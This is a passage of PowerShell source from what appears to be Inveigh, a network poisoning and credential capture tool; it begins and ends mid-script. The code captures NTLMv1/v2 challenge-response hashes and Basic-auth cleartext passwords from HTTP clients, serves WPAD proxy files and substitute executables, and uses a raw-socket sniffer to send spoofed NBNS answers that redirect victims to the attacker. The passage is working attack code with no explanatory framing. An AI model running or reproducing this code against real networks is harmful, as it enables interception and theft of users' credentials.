$inveigh.console_queue.Add("$HTTP_type POST request written to " + $inveigh.POST_request_out_file)
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type POST request captured from $HTTP_source_IP")
}
}
$HTTP_POST_request_old = $HTTP_POST_request
}
if($HTTP_header_authorization.StartsWith('NTLM '))
{
$HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
[Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
{
$NTLM = NTLMChallengeBase64 $Challenge $HTTPNTLMESS $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
}
elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
{
$HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
$HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
$HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
$HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
[String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
$inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
$NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
if($HTTP_NTLM_domain_length -eq 0)
{
$HTTP_NTLM_domain_string = ""
}
else
{
$HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
}
$HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
$HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
$HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
$HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
$HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
$HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
if($HTTP_NTLM_length -eq 24)
{
$NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
$NTLM_response = $NTLM_response.Insert(48,':')
$HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
$inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
}
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
$inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
$inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
}
if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
$inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
}
}
}
else
{
$NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
$NTLM_response = $NTLM_response.Insert(32,':')
$HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
{
$inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
}
if($inveigh.log_output)
{
$inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
}
if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
{
$inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
}
else
{
$inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
}
if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
{
$inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
$inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
}
if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
{
$inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
}
}
}
if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
{
$inveigh.IP_capture_list.Add($HTTP_source_IP)
}
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
$HTTP_client_close = $true
$NTLM_challenge = ""
if($proxy_listener)
{
if($HTTPResponse -or $HTTPDir)
{
$HTTP_header_cache_control = 0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,0x20,0x6e,0x6f,0x2d,0x63,0x61,0x63,0x68,0x65,0x2c,0x20,0x6e,0x6f,0x2d,0x73,0x74,0x6f,0x72,0x65
}
else
{
$HTTP_send = $false
}
}
}
else
{
$HTTP_client_close = $true
}
}
elseif($HTTP_header_authorization.startswith('Basic '))
{
$HTTP_response_status_code = 0x32,0x30,0x30
$HTTP_response_phrase = 0x4f,0x4b
$HTTP_header_authorization = $HTTP_header_authorization -replace 'Basic ',''
$cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($HTTP_header_authorization))
$HTTP_client_close = $true
$inveigh.cleartext_file_queue.Add($cleartext_credentials)
$inveigh.cleartext_list.Add($cleartext_credentials)
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
if($inveigh.file_output)
{
$inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")
}
}
if(($HTTP_request_raw_url -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
$WPADAuthIgnore.Count -gt 0 -and $WPADAuth -like 'NTLM*' -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})) -or $HTTP_client_close)
{
if($HTTPDir -and $HTTPDefaultEXE -and $HTTP_request_raw_url -like '*.exe' -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultEXE)) -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)))
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultEXE))
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/exe")
}
elseif($HTTPDir)
{
if($HTTPDefaultFile -and !(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url)) -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)) -and $HTTP_request_raw_url -notmatch '/wpad.dat')
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
elseif(($HTTPDefaultFile -and $HTTP_request_raw_url -eq '' -or $HTTPDefaultFile -and $HTTP_request_raw_url -eq '/') -and (Test-Path (Join-Path $HTTPDir $HTTPDefaultFile)))
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTPDefaultFile))
}
elseif($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat')
{
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($WPADResponse)
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
}
else
{
if(Test-Path (Join-Path $HTTPDir $HTTP_request_raw_url))
{
[Byte[]]$HTTP_message_bytes = [System.IO.File]::ReadAllBytes((Join-Path $HTTPDir $HTTP_request_raw_url))
}
else
{
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTPResponse)
}
}
}
else
{
if($WPADResponse -and $HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
{
$HTTP_message = $WPADResponse
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
}
elseif($HTTPResponse)
{
$HTTP_message = $HTTPResponse
if($HTTPContentType)
{
$HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTPContentType)
}
}
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
}
}
else
{
[Byte[]]$HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
}
$HTTP_timestamp = Get-Date -format r
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
$HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message_bytes.Length)
if(($HTTPAuth -like 'NTLM*' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
{
$HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
}
elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat'))
{
$HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm")
}
$packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
$packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
$packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
$packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
$packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
$packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
$packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
{
$packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
}
if($HTTP_header_content_type)
{
$packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
}
if($HTTP_header_cache_control)
{
$packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
}
if($HTTP_send)
{
$packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
$HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
$HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
$HTTP_stream.Flush()
}
Start-Sleep -m 10
$HTTP_request_raw_URL_old = $HTTP_request_raw_URL
$HTTP_client_handle_old = $HTTP_client.Client.Handle
if($HTTP_client_close)
{
$HTTP_reset_delay = $false
if($proxy_listener)
{
$HTTP_client.Client.Close()
}
else
{
$HTTP_client.Close()
}
}
}
else
{
if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
{
$HTTP_client.Close()
$HTTP_client_close = $true
$HTTP_reset_delay = $false
}
else
{
Start-Sleep -m 100
}
}
}
$HTTP_client.Close()
start-sleep -s 1
$HTTP_listener.Server.Blocking = $false
Start-Sleep -s 1
$HTTP_listener.Server.Close()
Start-Sleep -s 1
$HTTP_listener.Stop()
}
$sniffer_scriptblock =
{
param ($IP,$LLMNR,$LLMNR_response_message,$LLMNRTTL,$mDNS,$mDNS_response_message,$mDNSTypes,$mDNSTTL,$NBNS,$NBNS_response_message,$NBNSTypes,$NBNSTTL,$SMB,$SpooferHostsIgnore,$SpooferHostsReply,$SpooferIP,$SpooferIPsIgnore,$SpooferIPsReply,
$SpooferLearning,$SpooferLearningDelay,$SpooferLearningInterval)
$sniffer_running = $true
$byte_in = New-Object System.Byte[] 4
$byte_out = New-Object System.Byte[] 4
$byte_data = New-Object System.Byte[] 4096
$byte_in[0] = 1
$byte_in[1-3] = 0
$byte_out[0] = 1
$byte_out[1-3] = 0
$sniffer_socket = New-Object System.Net.Sockets.Socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP)
$sniffer_socket.SetSocketOption("IP","HeaderIncluded",$true)
$sniffer_socket.ReceiveBufferSize = 4096
try
{
$end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]"$IP",0)
}
catch
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
$sniffer_running = $false
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - Error starting sniffer/spoofer")
}
}
$sniffer_socket.Bind($end_point)
$sniffer_socket.IOControl([System.Net.Sockets.IOControlCode]::ReceiveAll,$byte_in,$byte_out)
$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
[Array]::Reverse($LLMNR_TTL_bytes)
$mDNS_TTL_bytes = [System.BitConverter]::GetBytes($mDNSTTL)
[Array]::Reverse($mDNS_TTL_bytes)
$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
[Array]::Reverse($NBNS_TTL_bytes)
$LLMNR_learning_log = New-Object System.Collections.Generic.List[string]
$NBNS_learning_log = New-Object System.Collections.Generic.List[string]
if($SpooferLearningDelay)
{
$spoofer_learning_delay = New-TimeSpan -Minutes $SpooferLearningDelay
$spoofer_learning_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
}
while($inveigh.running -and $sniffer_running)
{
$packet_data = $sniffer_socket.Receive($byte_data,0,$byte_data.Length,[System.Net.Sockets.SocketFlags]::None)
$memory_stream = New-Object System.IO.MemoryStream($byte_data,0,$packet_data)
$binary_reader = New-Object System.IO.BinaryReader($memory_stream)
$version_HL = $binary_reader.ReadByte()
$binary_reader.ReadByte() > $null
$total_length = DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(5) > $null
$protocol_number = $binary_reader.ReadByte()
$binary_reader.ReadBytes(2) > $null
$source_IP_bytes = $binary_reader.ReadBytes(4)
$source_IP = [System.Net.IPAddress]$source_IP_bytes
$destination_IP_bytes = $binary_reader.ReadBytes(4)
$destination_IP = [System.Net.IPAddress]$destination_IP_bytes
$header_length = [Int]"0x$(('{0:X}' -f $version_HL)[1])" * 4
switch($protocol_number)
{
6
{
$source_port = DataToUInt16 $binary_reader.ReadBytes(2)
$destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
$binary_reader.ReadBytes(8) > $null
$TCP_header_length = [Int]"0x$(('{0:X}' -f $binary_reader.ReadByte())[0])" * 4
$binary_reader.ReadBytes(7) > $null
$payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length))
switch ($destination_port)
{
139
{
if($SMB -eq 'Y')
{
if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
{
SMBNTLMResponse $payload_bytes
}
$client_IP = ""
$client_port = ""
$NTLM_challenge = ""
}
}
445
{
if($SMB -eq 'Y')
{
if($NTLM_challenge -and $client_IP -eq $source_IP -and $client_port -eq $source_port)
{
SMBNTLMResponse $payload_bytes
}
$client_IP = ""
$client_port = ""
$NTLM_challenge = ""
}
}
}
switch ($source_port)
{
139
{
if($SMB -eq 'Y')
{
$client_IP = $destination_IP
$client_port = $destination_port
$NTLM_challenge = SMBNTLMChallenge $payload_bytes
}
}
445
{
if($SMB -eq 'Y')
{
$client_IP = $destination_IP
$client_port = $destination_port
$NTLM_challenge = SMBNTLMChallenge $payload_bytes
}
}
}
}
17
{
$source_port = $binary_reader.ReadBytes(2)
$endpoint_source_port = DataToUInt16 ($source_port)
$destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
$UDP_length = $binary_reader.ReadBytes(2)
$UDP_length_uint = DataToUInt16 ($UDP_length)
$binary_reader.ReadBytes(2) > $null
$payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)
switch($destination_port)
{
137
{
if(([System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -or [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01') -and [System.BitConverter]::ToString($payload_bytes[10..11]) -ne '00-01')
{
$UDP_length[0] += 12
$NBNS_response_data = $payload_bytes[13..$payload_bytes.Length] +
$NBNS_TTL_bytes +
0x00,0x06,0x00,0x00 +
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
$NBNS_response_packet = 0x00,0x89 +
$source_port[1,0] +
$UDP_length[1,0] +
0x00,0x00 +
$payload_bytes[0,1] +
0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
$NBNS_response_data
$NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])
switch ($NBNS_query_type)
{
'41-41'
{
$NBNS_query_type = '00'
}
'41-44'
{
$NBNS_query_type = '03'
}
'43-41'
{
$NBNS_query_type = '20'
}
'42-4C'
{
$NBNS_query_type = '1B'
}
'42-4D'
{
$NBNS_query_type = '1C'
}
'42-4E'
{
$NBNS_query_type = '1D'
}
'42-4F'
{
$NBNS_query_type = '1E'
}
}
$NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.Length - 4)])
$NBNS_query = $NBNS_query -replace "-00",""
$NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
$NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
$NBNS_query_string_subtracted = ""
$NBNS_query_string = ""
$n = 0
do
{
$NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
$NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
$n += 1
}
until($n -gt ($NBNS_query_string_encoded.Length - 1))
$n = 0
do
{
$NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
$n += 2
}
until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
$NBNS_request_ignore = $false
if($NBNS -eq 'Y')
{
if($SpooferLearning -eq 'Y' -and $inveigh.valid_host_list -notcontains $NBNS_query_string -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00' -and $source_IP -ne $IP)
{
if(($NBNS_learning_log.Exists({param($s) $s -like "20* $NBNS_query_string"})))
{
$NBNS_learning_queue_time = [DateTime]$NBNS_learning_log.Find({param($s) $s -like "20* $NBNS_query_string"}).SubString(0,19)
if((Get-Date) -ge $NBNS_learning_queue_time.AddMinutes($SpooferLearningInterval))
{
$NBNS_learning_log.RemoveAt($NBNS_learning_log.FindIndex({param($s) $s -like "20* $NBNS_query_string"}))
$NBNS_learning_send = $true
}
else
{
$NBNS_learning_send = $false
}
}
else
{
$NBNS_learning_send = $true
}
if($NBNS_learning_send)
{
$NBNS_transaction_ID = [String](1..2 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
$NBNS_transaction_ID_bytes = $NBNS_transaction_ID.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$NBNS_transaction_ID = $NBNS_transaction_ID -replace " ","-"
$NBNS_UDP_client = new-Object System.Net.Sockets.UdpClient 137
$NBNS_hostname_bytes = $payload_bytes[13..($payload_bytes.Length - 5)]
$NBNS_request_packet = $NBNS_transaction_ID_bytes +
0x01,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20 +
$NBNS_hostname_bytes +
0x00,0x20,0x00,0x01
$NBNS_learning_destination_endpoint = New-Object System.Net.IPEndpoint([IPAddress]::broadcast,137)
$NBNS_UDP_client.Connect($NBNS_learning_destination_endpoint)
$NBNS_UDP_client.Send($NBNS_request_packet,$NBNS_request_packet.Length)
$NBNS_UDP_client.Close()
$NBNS_learning_log.Add("$(Get-Date -format 's') $NBNS_transaction_ID $NBNS_query_string")
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - LLMNR request for $NBNS_query_string sent to " + $NBNS_learning_destination_endpoint.Address.IPAddressToString)
}
}
}
if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
$SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and (
$NBNSTypes -contains $NBNS_query_type))
{
if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$NBNS_send_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Raw,[System.Net.Sockets.ProtocolType]::Udp)
$NBNS_send_socket.SendBufferSize = 1024
$NBNS_destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
$NBNS_send_socket.SendTo($NBNS_response_packet,$NBNS_destination_point)
$NBNS_send_socket.Close()
$NBNS_response_message = "- response sent"
}
else
{
$NBNS_request_ignore = $true
}
}
else
{
if($source_IP -eq $IP -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$NBNS_request_ignore = $true
}
elseif($NBNSTypes -notcontains $NBNS_query_type)
{
$NBNS_response_message = "- disabled NBNS type"
}
elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
{
$NBNS_response_message = "- $NBNS_query_string is not on reply list"
}
elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
{
$NBNS_response_message = "- $NBNS_query_string is on ignore list"
}
elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
{
$NBNS_response_message = "- $source_IP is not on reply list"
}
elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
{
$NBNS_response_message = "- $source_IP is on ignore list"
}
elseif($NBNS_query_string.Trim() -eq '*')
{
$NBNS_response_message = "- NBSTAT request"
}
elseif($inveigh.valid_host_list -contains $NBNS_query_string)
{
$NBNS_response_message = "- $NBNS_query_string is a valid host"
}
elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
{
$NBNS_response_message = "- previous capture from $source_IP"
}
elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
{
$NBNS_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
}
elseif($source_IP -eq $IP -and !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
$NBNS_response_message = "- local request"
}
else
{
$NBNS_response_message = "- something went wrong"
}
}
}
if(!$NBNS_request_ignore -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-01-00-00')
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
if($inveigh.file_output)
{
$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
}
if($inveigh.log_output)
{
$inveigh.log.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
}
}
elseif($SpooferLearning -eq 'Y' -and [System.BitConverter]::ToString($payload_bytes[4..7]) -eq '00-00-00-01' -and $NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
{
[Byte[]]$NBNS_response_IP_bytes = $payload_bytes[($payload_bytes.Length - 4)..($payload_bytes.Length)]
$NBNS_response_IP = [System.Net.IPAddress]$NBNS_response_IP_bytes
$NBNS_response_IP = $NBNS_response_IP.IPAddressToString
if($inveigh.valid_host_list -notcontains $NBNS_query_string)
{
$inveigh.valid_host_list.Add($NBNS_query_string)
